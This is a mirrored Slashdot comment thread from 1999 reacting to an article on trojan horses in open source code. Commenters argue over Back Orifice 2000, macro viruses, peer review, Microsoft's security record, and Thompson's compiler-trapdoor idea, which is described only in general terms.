Slashdot Mirror
Open Source Concerns: Trojan Horses In the Code
crisco writes to us with an article from InternetWeek addressing the concern of "trojan horse programs concealed inside open source code that could create new security headaches for IT managers", as the article says. The article deals mainly with the BO2K issue, which makes the whole open source connection a bit of a stretch.
What? open source programs are LESS likely to have trojans, right? If you follow common sense logic, any code that is open to review by peers is less likely to have any trojans/bugs, etc.
FUD, nothing more.
Trojan horse programs concealed inside open source code could create new security headaches for IT managers. One such program released last week, BackOrifice 2000...
/... ;P
BO2k isn't concealed inside another program..
When virus writers moved to an open source model in 1996, there was an explosion in macro viruses,...
Ah yes, I remember the good old days of proprietary virii...NOT.
The explosion in macro virii wouldn't have anything to do with a program that
could _host_ them now, would it?
Like, I don't know, maybe MS Office?
No mention of how much easier it is to construct
a macro virus as opposed to a real virus done in, say, x86 assembler.
Organizations "absolutely should be putting
security measures in place if they use NT to a
great degree" to thwart BO2K-specific attacks,
said Drew Williams, director of Axent Technologies'
SWAT Team.
Hmm, not quite sure what to say about this one...
Are they saying:
A)You don't need security if you don't use NT
B)You shouldn't use NT (I'll buy that)
C)If you only have one NT box you don't have to worry
D)Win9x, 3.1 aren't vulnerable
Internet Security Systems researchers have
already decoded BO2K protocols and encryption
algorithms.
Nice trick...somebody must have sent them the source
code in an encrypted email, yeah, thats
the ticket...
Jason Garms, product manager for NT security at
Microsoft, said the company will fix any known
security vulnerabilities in its operating
systems. "There's nothing wrong with [Microsoft]
systems until Back Orifice is installed.
Oh my.... Somebody should start
a 12 step group for folks like this
I detect some serious denial problems here.
How much are these fixes going to cost?
When can we expect delivery?
Thats what I thought...
Users on NT networks that
exchange files and use Internet chat systems
are at the highest risk....
So..don't use your network to
transfer files..just look at the pretty lights....
The elite hacker group is banking on tools
such as BO2K to eventually force Microsoft
to correct security weaknesses in its operating
systems.
Security experts don't see the logic.
"They didn't have to write code and
release it to the public," said ICSA's Thompson.
The bastards, how _dare_ they try
to push around Micros~1!
Who's the real victim here? Micros~1
or the "Security Experts" who have to get
off their well padded rear ends and do some work now?
Oh wait, I guess security expert is a synonym for pundit now.
Once the program is released,
Axent's Williams expects an "immediate
spike" in hacking activity
on NT systems, but expects it to trickle down to
some level of manageability.
The program is already released, Sparky...
I expect this is true if we use hacking in the
proper sense as in "Micros~1 programmers fixing
things up a bit"..
Though I expect if you replace "hack" with "kludge"
it'd be a little more accurate
Now _this_ is the kind of story I expect to see on
Just like backinaday
I found that humorous as well. Macro virus authors didn't "choose" an open source development model. Their source is available because it's in a macro, so the source has to be available. It's like saying that DOS .bat script writers have switched to open source, or that bash shell script writers have switched to open source, as if they had a choice.
10 PRINT CHR$(205.5+RND(1)); : GOTO 10
.. these kind of tools, like bo2k have the potential to harm windows 2k very much.. to wipe it out of the marketplace.. to even destroy microsoft.. that would be terrible! That would be tragic!
La. La. La la la.
I still wonder what hapenned to them.
Interrestingly, the viruses where very often using undocumented functions in MS-DOS (and not only the InDos flag), some where really incredible.
When virus writers moved to an open source model in 1996, there was an explosion in macro viruses,
Excuse me ?? Macro Viruses? Wasn't it Microsofts own macro language that resulted in the rise of Macro Viruses. Open source had nothing to do with it. Damm read that line again what a load of Bullsh#t!
If you go to the BO2k website you'll see that Microsoft uses the STEALTH feature in their own product.
www.cultdeadcow.com/news/pr19990719.html
SMS is Microsoft's remote admin tool for Windows. As it happens, SMS has a nearly identical
stealth feature. As a matter of fact, they explain this feature in a Word document available
from the Microsoft website:
Linux is only free if your time has no value. Windows is only free if you threaten to use Linux.
It would be interesting and useful to make an OSS
verification group which would audit open source
projects for security problems (intentional or no),
determine what platforms the source compiles on,
look for bugs, and ideally submit patches back to
authors and possibly sell support and/or legal
liability for program failings.
For every problem, there is at least one solution that is simple, neat, and wrong.
I think that you might have misinterpreted what this article is about. It is merely an article about Bo2k and how the fact that IS open source will cause problems for people. Meanwhile, it eludes the somewhat minor problem of people writing patches for legitimate software that turns in into trojan like software.
However I did glean a few bits of interesting stuff. Mainly that Microsoft is saying that if its a real remote admin tool that it wouldn't hide from the administrator. Umm, excuse me, I have the displeasure of having an NT server box here at work that I'm pseudo responsible for and NT Server Manager hides.
Secondly it doesn't mention the fact that if NT were written worth a damn, then it wouldn't be POSSIBLE to do this sort of stuff to it. There was the comment about it preying on users and not administrators, which is partially true, but its really MSs fault in the first place.
There was only one other thing that I disagreed with. It said something about when virus writers switched to open source in 1996 (like it was some sort of heavenly revelation) that there was proliferation in macro viruses. This may be true. But its more likely due to the rise of people who are using IE and Outlook for their net browsing and email reading.
Oh well, if nothing else the cDc by releasing the source code will actually FORCE microsoft to patch the whole and release patches that detect the software.
My Slashdot account is old enough to drink...
This is an old issue. Not totally without merit, but as companies like Red Hat come to depend on OSS code, I sure some amount of QA will be done.
Further, OSS has been around a long while. This sort of thing can happen, but it doesn't last too long.
Sounds like a case of old fashion FUD.
Why bother with articles like this? Because issues about security need to be discussed. Its bringing valuable topics that can educate more people about why security is too underrated and how to make it top priority. We need to share more horror stories that are often hidden in fear and shame so people will start to value what a good system can do to protect their resources. Expect to see articles like this many times in the future.
The article says that because Back Orifice is open source, there will be more variants of Back Ofifice, and that this will be more of a problem for virus detection vendors.
However, the security problem exploited by Back Orifice is Microsoft's fault. The release of Back Orifice is an attempt to force Microsoft to deal with its security problems.
Folks, if you are running software that has wide-open security problems, like Back Office, and the vendor won't help you except to give you sorry band-aids like virus detection software, it's time for you to lean on that vendor. There is no reason for Microsoft to continue to leave the barn door open - they are every bit as guilty as the computer criminals who exploit that, and in a just world MS executives would be charged, tried, and jailed for the computer crime they have facilitated.
Thanks
Bruce Perens
Bruce Perens.
BO2K (or BO for that matter) do not exploit anything. Ever hear of "Remotely Possible","PC Anywhere", or any one of the numerous other remote control products? The only security flaw it seems to be exploiting is the ease of hiding a process from the user. This isn't to say that BO isn't a security risk, because it most definitely is. Maybe that is mainly due to the mindset of most Microsoft product users, but other users of other systems are not immune.
Basically BO enables a single-user system to act with some of the functionality of a multi-user system. Something, Windows 9x definitely doesn't have the security for. Windows NT has some protection in this realm, but still, not enough for a multi-user system. They were never designed to be multi-user systems. But then again, a root kit will enable the same functions on a linux box as this does on a Windows box, it just may be a bit more of a challenge to get the thing installed.
One interesting flaw (well, IMHO it's a flaw) that this could potentially exploit with the right plug-in, is a feature of the MS Crypto-API that will release any certificates installed in the system. If someone teaches the BO doggy a new trick to extract certificates (which as a process of the user, it has the right to do, WITHOUT authentication) there could potentially be a big problem with digital signatures, which are now becoming accepted as substitutes for "wet" signatures (think: paper and pen).
Oh.. think of the possibilities..
P.S. - I am a spelling and grammer genius. Any errors you think you see in this document are probably just transmition errors, and most likely your fault.
P.S. Any misspellings or faults of grammar you think you detect are mearly transmition errors, and probably your fault a
Isn't it actually the other way around? I thought that macros were by definition open source (i.e. not compiled) so variants were easily proliferated. This is different from saying that once "virus hackers" decided to open their souce, people suddenly had new tools to create macro viruses.
p.s. damn, I was gonna use that sig! :)
I've already seen a trojan hiding in a program. I was looking at this whizbang spreadsheet and it had an entire FLIGHT SIMULATOR built into it. Can you imagine that some hacker who had access to the source code can slip something like that into the code? Good thing it was harmless and didn't format my hard drive.
Yup, that open source is DANGEROUS.....er, wait a sec....me very sorry....the spreadsheet was Microsoft Excel....nevermind.
If tits were wings it'd be flying around.
I'd be more concerned about trojan horses in closed-source, proprietary programs, because for the most part they are not subject to the same amount of peer-review as their open-source counterparts.
Cheers,
Joshua.
--jon. Postel is dead. May we all mourn his, and our, loss.
(I allways find Dijkstras 'gotos considered harmfull' hilarious. The man is so narrow minded B-)
You've got to remember that Dijkstra was writing that in an era when most programs were still being written in assembler, COBOL, or FORTRAN IV. Anyone who has had to maintain e.g. a FORTRAN IV program will sympathize with the sentiment.
Then too, Dijkstra was a Burroughs Fellow, and Burroughs was well known for machines whose "assembly language" was a variant of ALGOL.
Before I read this I thought all those backdoor stories in Heinlein books or Gibsons Stuff where just urban Myth
Not at all. Backdoors were (are?) fairly common to allow access to special or privileged functions for maintenance/debugging (or cracking). My favorite was the phrase "Springhead, this is worker", borrowed from a Firesign Theatre sketch.
-- Alastair
http://www.opensource.org/halloween/
kmj
The only reason I keep my ms-dos partition is so I can mount it like the b*tch it is.
kmj
The only reason I keep my ms-dos partition is so I can mount it like the b*tch it is.
Why do we bother even responding to these articles. Anyone with half a brain can see that their arguments make no sense and that this is just incredibly stupid analysis.
Personally, I think we would all be well served to just leave articles like this alone and not waste our breath on them.
This article has a very interesting slant. It seems to regard the cDc as a legitimate software company. Just because they say that BO2K is a remote admin tool, doesn't mean that's what it is for.
Open Source is not the problem here. Open Source can help with problems like Trojan horses. The problem is those people who intend to use this software for breaking into NT machines. No NT Admin is going to download this thinking that he's going to administrate his network better with this. There are plenty of other tools out there that can do that.
cDc has developed a potentially malicious tool if used for its' proper intent. No one should see it as anything else.
Sorry
--
--
Think Green... Burn only 100% recycled dinosaurs in you car.
To start, one thing needs to be clarified: This article has nothing to do with Linux or the open-source community, per se. Peer-reviewed open source programs (e.g. anything with the GPL) undergo great scrutiny by a virtual army of developers to ensure that the software IS secure.
The problem with BO2K being "open-source" is that crackers will NOT publish their modifications to the code. This will allow BO2K to potentially fragment into several mutated versions, each slightly different from the next. This makes it more difficult to detect and guard against all variations of BO2K, since crackers might be able to make small modifications to the software that would allow it to slip by security software undetected.
Power corrupts. PowerPoint corrupts absolutely.
Beware goddesses bearing apples.
--The basis of all love is respect
The article basically just complains about the motives of cDc and the fact that the open source nature of the program will make it difficult for antivirus software to detect different strains and will allow other "malicious" coders a head start.
However, the article doesn't really discuss anything about dangers to the open source movement itself, and I don't really see these dangers either.
Ok, so somebody writes their own copy of, lets say, telnetd with a built in trojan horse. Well, this has already been done before, just download a rootkit from rootshell.org if you want it. nothing new.
Of course, if this trojan was to make it into an official distribution it would have to get by several pairs of eyes first. Say I found some clever way to insert a trojan horse into the kernel itself. In order for it to make it into the official kernel release, Linus himself would have to approve the code (or some other competant coder would). Since not just ANY code is blindly inserted into the kernel, I seriously doubt this would work.
Most other open source is handled in the same way. There's always someone who reviews changes before it gets into the primary release, and even if that person was sleeping that day, eventually someone would discover it, and the coder would be exposed. I just don't see it as a problem.
-Restil
Play with my webcams and lights here
I've played around with BO2k already. Great tool for remote admin - in a market where other packages cost an arm and a leg. If the
AV companies all delete the hell out of BO2k, I'm not going to be able to use it, because I'm thinking I will rely on both. (the
upcoming plugins for bo2k will help in software distribution GREATLY.) what should I do? I don't know enough C/++ whatever to
modify what the signature would be - maybe some tips?
I'm interested in BO2K for the same reasons as you. I use VNC all the time to fix the bi-daily problem with my brother's 98 machine. I also connect to my machine from work and school to check mail, read documentation, etc.
Frankly, I don't see the security risk. Putting BO2K on my brother's computer is no different than putting VNC or PC-Anywhere on it.
I'll try out BO2K when there is a *NIX client. My favourite VNC feature is the Java client so that I can use it within a browser without having to download stuff.
As for your AV problem, I suggest you find out what your AV software does (or will do) regarding BO2K. I think nothing is appropriate. This is a tool, and anybody who is scared of it is, well, not very computer-literate. According to the site, there is no known way to detect it running on a remote machine. That's a good thing. There's obviously no backdoor, or we'd all know about it now.
Any AV company who discriminates against BO2K needs a stern talking to. Imagine if AV software automatically deleted Linux partitions from your HD. It's a similar situation, discriminating against OSS alternatives to proprietary software. On my computer at school, the previous user turned on the AV features and password protected it (I would have fixed that, but I haven't rebooted it in months, and don't care to). It detects in the boot sector, oh my god, a VIRUS!!! Sorry, only LILO. Imagine the new user who installs Linux only to get this message, thinking it's real.
That can't be good.
you see... the open source community is the security verification group. when one of the Xmillion number of linux users says "hey, i can hack this using only 4 lines of code", the open source community springs into action, and says.... oh... ok, here's the patch....
The appearance of a trojan is nil, as everyone could see the backdoor in plain view, and close it, and then flame the heck out of whoever tried to put it in.
Security by Obscurity does not work. Just look at NT... or MacOS-X...
... hi bingo
A rather misinformed and misleading article such as this really means when starting an article with "Trojan horse programs concealed inside open source code" is "Look at me!" In other words, a poorly masked use of attention-getting buzzwords with little knowledge of their meaning or proper use.
Is the bo2k open source? Apparently. Will that help it's proliferation? Probably, although as far as I have read it is made to be particularly evasive in the first place. Does this have any relevance to the common usage of the term "open source" and the people who will be drawn to read the article based upon it's use of this term? Of course not.
To make matters worse, and to muddy the waters to a point obvious to anyone reading the proliferation of comments on this topic, this article refers to bo2k as a trojan horse. This is completely and totally untrue and misleading. A trojan horse is a program that imbeds itself in another, allowing itself to be executed (usually unnoticed) when the enclosing program is run. Such a practice is devious and obviously viral and totally unlike this program.
Back Orifice's server is an executable program that runs in and of itself. It does so very quietly and (due to, in my opinion, an oversite on Microsoft's development) is difficult to detect. It is a server program, an application, and in no way a trojan horse.
The reason this has muddied the waters, at least at slashdot, is that the image of a trojan horse in open source software (in other words, offending source code placed unnoticed in trusted source code) provokes most open source advocates to bring up the issue of peer review's ability to eliminate such 'trojan horses.' These arguments, though accurate, are completely irrelevant when one considers that there are not trojan horses (either in source code or executable form) involved.
But the article did what was intended: It provoked many of us to read it that would not have otherwise. Congrats.
Oh, and as a side not: I have seen it mentioned many times that Back Orifice exploits security risks in Windows operating systems. Basically, this is untrue. I am not a Microsoft fan by any stretch of the term, but I find it hard to fathom people considering a server program, run with the equivelant of root privilages, as exploiting security risks if it can actually control a system. Telnetting (or more wisely ssh'ing) in to a unix box of any variety that I know and su -'ing allows anyone with knowledge of the root password the ability to control basically any aspect of the system in question. The two security holes that this exploits are the inadequate task management of Windows OS's and the overuse of administration-level accounts in doing user-level operations. Oh, and the execution of untrustworthy applications, which can not (except perhaps in the case of macros) be blamed on MS.
Yes, OSS makes it easy for disgruntled people to get trojan code into a program, but there are several ways to deal with this.
- Only download code from trusted sources. This means that you only get the latest gnome patches from the gnome website or from official mirrors. If you follow this
- In addition to this, use PGP/GPG signatures to validate what you are getting against the official distribution. If you download an official distribution of a package, it is safe to assume that patches have been looked at by several sets of eyes to ensure that they are OK before they were added to the code base.
There is a missconception by IT suits that there is a complete lack of change control in Open Source projects. The people where I work had this missconception that I could do a search for "linux device foobar2000x drivers" and would find hundreds of different patches. IMHO, Open Source projects are one of the best examples of change control as maintainers shift through many different patches before deciding what ones are worth applying.Deepak Saxena
Project Director, Linux Demo Day '99
Deepak Saxena
"Computers are useless, they can only give you answers" - Picasso
The hack was in the C compiler. It consisted of two parts:
- If the compiler recongized that it was compiling the login program, it expanded a canned macro that added a trapdoor - a canned login and password that gave root access.
- If the compiler recognized that it was compiling itself, it expanded a canned macro that added the recognize-and-expand-canned-macros code, along with the macros, to the new copy of the compiler.
You only have to compile this in once, after which you can throw out the patch and it propagates to later versions of the compiler. BUT:
- It only lives in compilers.
- It only works as long as they're being compiled by themselves, in a never-ending stream. It will NOT propagate to a new compiler implementation, such as making the hop from PCC to gnu, or being installed in a new version of PCC that was compiled by gnu rather than PCC. (In principle you could build one that recognized TWO or more compilers and could hop back and forth, though that makes it twice as fragile.)
- It will die as soon as a change to the compiler source renders the signature unrecognizable.
- Even if it is alive, it stops inserting trapdoors once the signature of the target program changes.
Rumor has it that this was actually propagated in the Portable C Compiler {PCC}, and was discovered and cleaned out when the guys at Berkeley wrote strings, and wondered why the compiler had the string "login".
Note that this is MUCH easier to do with a proprietary compiler than an open one. Gcc, for instance, is shipped in source, with a build file that lets it be built by just about any C compiler, not just an older gcc. Even if a Thompson trojan virus existed for gcc, it isn't inserted when you compile with another compiler, producing a clean gcc that only has what its own source implies and only emits what the target's source implies. (It's almost as if NONinfection was infectious.)
So even a security paranoid like myself isn't worried about trojans that aren't there to be spotted in the open source.
Bantam Dominique roosters crow a four-note song. Once you've heard it as "Happy BIRTHday" you can't NOT hear it that way
"Fear, Uncertainty, Doubt" - cheap marketing strategy.
It seems to me the term was brought into more common usage by the Halloween documents (they`re no longer posted anywhere i can find them).
OFTC: By the community, for the community
Which is an argument for:
1) Get your kernel from one of the standard sources, i.e. kernel.org or a mirror.
2) Verify the PGP signature.
Then, at least, you know you are running a real release, the same one hundreds of thousands of other people are running, and not one that someone has subsequently hacked.
The other question is: How do we know the real release wasn't hacked? Short of looking yourself, there are many other people using the same code, including developers, and also people who analyze the patches to summarize changes. Even if a trojan patch did slip Linus' attention, it would be discovered very quickly and removed quicker.
(And yeah, it's the Greeks, but which ones? The Trojans were Greek too, weren't they?)
This message has been scanned for memes and dangerous content by MindScanner, and is believed to be unclean.
People never seem to remember the important lesson of the original Trojan horse. The Trojans left this nice horse statue as a gift, and the suckers (can't remember who the Trojans were at war with) take it inside their secured area. Later that night, the Trojans hidden inside the horse jump out and kill them.
The lesson: Look inside the friggin' horse, you stupid idiots! And THAT is something you can do with open source that you cannot do with closed, proprietary software.
This message has been scanned for memes and dangerous content by MindScanner, and is believed to be unclean.
Open Source makes it far easier for anybody who has decent programming skills to dig into the system and do all sorts of things. Generally on a local level, not on a widespread level as is the case with closed source OSes.
98% of the world's computer users are 'dumb enough' to use software they didn't compile themselves, from source code they personally reviewed. Actually that should be 99.99% of the world, since there isn't anybody here reading this message who has read every bit of source code for every thing s/he runs.
Open Source turns it into a "local" problem rather than a 'big scale' problem as is the case when unfriendly code is widely distributed in closed source software.
"Peer review" doesn't solve anything if Hacker X at Podunk Corporation slips an exploit into the payroll machine.
It's a far more complex issue than many people in this discussion thread seem ready to recognize.